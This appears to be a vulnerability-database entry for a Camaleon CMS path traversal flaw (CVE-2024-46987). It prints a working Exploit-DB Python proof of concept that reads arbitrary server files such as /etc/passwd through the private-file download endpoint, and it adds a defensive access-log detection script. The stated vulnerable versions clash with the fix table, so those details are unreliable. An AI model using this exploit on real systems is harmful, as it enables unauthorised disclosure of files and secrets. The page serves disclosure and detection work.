CVE-2024-46987
unknown
CVSS v3: not available
CVSS v4: not available
VIR risk: 1.0
Description
Camaleon CMS vulnerable to arbitrary path traversal (GHSL-2024-183)
Predictions
Exploit likelihood
65%
Patch ETA: not available
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Camaleon CMS v2.9.0 - Path Traversal
# Exploit Title: Camaleon CMS v2.9.0 - Path Traversal
# Date: 2026-02-02
# Exploit Author: Sakshi Velampudi (CyberQuestor)
# Vendor Homepage: https://github.com/owen2345/camaleon-cms
# Software Link: https://github.com/owen2345/camaleon-cms/releases/tag/2.9.0
# Version: <= 2.9.0
# Tested on: Linux
# CVE: CVE-2024-46987
# Authentication: Required (auth_token cookie)
# --------------------------------------------------
# Description
# Sends a single HTTP GET request to a vulnerable private file download endpoint
# Uses an auth_token cookie required for admin access
# Detects invalid authentication via redirect to /admin/login
# Displays a preview of the response when file retrieval succeeds
# Usage:
# Run only against systems explicitly authorized for testing
# --------------------------------------------------
"""
Camaleon CMS v2.9.0 - Path Traversal Proof of Concept
"""
import requests
print("\nCamaleon CMS v2.9.0 - Path Traversal PoC (authorized testing only)\n")
# --------------------------------------------------
# 1) Input Collection
# --------------------------------------------------
target_url = input("Target base URL (example: http://target.com): ").strip()
requested_path = input("File path to request (example: /etc/passwd): ").strip()
token = input("auth_token value: ").strip()
if not target_url or not requested_path or not token:
    print("\n[!] Error: URL, file path, and auth_token are required.\n")
    raise SystemExit(1)
# Normalize base URL to avoid malformed paths
target_url = target_url.rstrip("/")
# --------------------------------------------------
# 2) Request Construction
# --------------------------------------------------
url = (
    f"{target_url}"
    f"/admin/media/download_private_file"
    f"?file=../../../../../../{requested_path.lstrip('/')}"
)
cookies = {"auth_token": token}
# --------------------------------------------------
# 3) Request Execution
# --------------------------------------------------
# Redirects are disabled to capture authentication failures.
try:
    response = requests.get(url, cookies=cookies, timeout=10, allow_redirects=False)
except requests.exceptions.RequestException as e:
    print(f"\n[!] Request error: {e}\n")
    raise SystemExit(2)
# --------------------------------------------------
# 4) Response Handling
# --------------------------------------------------
print(f"\n[+] HTTP Status: {response.status_code}")
# Invalid authentication typically results in a redirect to the admin login page
if response.status_code == 302:
    location = response.headers.get("Location", "")
    if "/admin/login" in location:
        print(f"[!] auth_token may be incorrect or expired (redirected to {location}).")
    else:
        print(f"[!] Redirected to: {location or '(no Location header)'}")
    raise SystemExit(1)
# Successful response
if response.status_code == 200:
    print("\n[+] Response preview:\n")
    preview = response.text[:3000]
    print(preview)
    if len(response.text) > 3000:
        print("\n...output truncated...")
    raise SystemExit(0)
# Other failure conditions
print("\n[!] Request failed.")
if response.status_code == 500:
    print("[!] The file path may be invalid, or the server encountered an internal error.")
print(f"[i] Response length: {len(response.content)} bytes")
raise SystemExit(1)
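For defenders, the request shape above (the download_private_file endpoint with a file parameter carrying ../ segments) is directly detectable in web server access logs. The following is an added example, not part of the Exploit-DB entry or the Camaleon CMS project; it assumes combined-format access logs and uses constructed sample lines, and it also peels repeated URL encoding so encoded variants of the same request are caught.

```python
import re
from urllib.parse import parse_qs, unquote, urlparse

# Endpoint and parameter name taken from the PoC request above.
TARGET_ENDPOINT = "/admin/media/download_private_file"
# A ".." path segment delimited by / or \ (or the start/end of the value).
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
# Request line of a combined-format access log, e.g. "GET /p?x=y HTTP/1.1" 200
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def traversal_in_file_param(request_target):
    """Return the decoded 'file' value if the request hits the private-file
    download endpoint with a parent-directory segment, otherwise None."""
    parsed = urlparse(request_target)
    if parsed.path.rstrip("/") != TARGET_ENDPOINT:
        return None
    for value in parse_qs(parsed.query, keep_blank_values=True).get("file", []):
        decoded = value
        for _ in range(3):  # peel double/triple URL encoding (%252e%252e)
            decoded = unquote(decoded)
        if TRAVERSAL_RE.search(decoded):
            return decoded
    return None


def scan_access_log(lines):
    """Return (status, decoded_file) for each line that looks like an attempt.
    A 200 means the file was served; a 302 (to /admin/login) means the request
    was unauthenticated, which the PoC itself reports as a failure."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        hit = traversal_in_file_param(match.group("target"))
        if hit is not None:
            hits.append((match.group("status"), hit))
    return hits


# Constructed sample log lines (not taken from any real system).
SAMPLE_LOG = [
    '203.0.113.5 - - [02/Feb/2026:10:00:00 +0000] "GET /admin/media/download_private_file?file=../../../../../../etc/passwd HTTP/1.1" 200 2048 "-" "python-requests/2.31"',
    '203.0.113.5 - - [02/Feb/2026:10:00:01 +0000] "GET /admin/media/download_private_file?file=%252e%252e%2f%252e%252e%2fconfig%2fdatabase.yml HTTP/1.1" 302 0 "-" "python-requests/2.31"',
    '198.51.100.7 - - [02/Feb/2026:10:00:02 +0000] "GET /admin/media/download_private_file?file=reports/q1.pdf HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [02/Feb/2026:10:00:03 +0000] "GET /admin/media?file=../../x HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for status, path in scan_access_log(SAMPLE_LOG):
        print(f"[{status}] traversal attempt on private file download: {path}")
```

Only the two lines aimed at the vulnerable endpoint are reported; the benign download and the request to a different path are ignored, and the double-encoded variant is decoded before matching.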
Package impact
| Ecosystem | Package | Vulnerable | Fixed |
|---|---|---|---|
| RubyGems | camaleon_cms | < 2.8.1 | 2.8.1 |
References
- https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-cp65-5m9r-vc2c
- https://nvd.nist.gov/vuln/detail/CVE-2024-46987
- https://github.com/owen2345/camaleon-cms/commit/071b1b09d6d61ab02a5960b1ccafd9d9c2155a3e
- https://codeql.github.com/codeql-query-help/ruby/rb-path-injection
- https://github.com/owen2345/camaleon-cms
- https://github.com/rubysec/ruby-advisory-db/blob/master/gems/camaleon_cms/CVE-2024-46987.yml
- https://owasp.org/www-community/attacks/Path_Traversal
- https://securitylab.github.com/advisories/GHSL-2024-182_GHSL-2024-186_Camaleon_CMS
- https://www.reddit.com/r/rails/comments/1exwtdm/camaleon_cms_281_has_been_released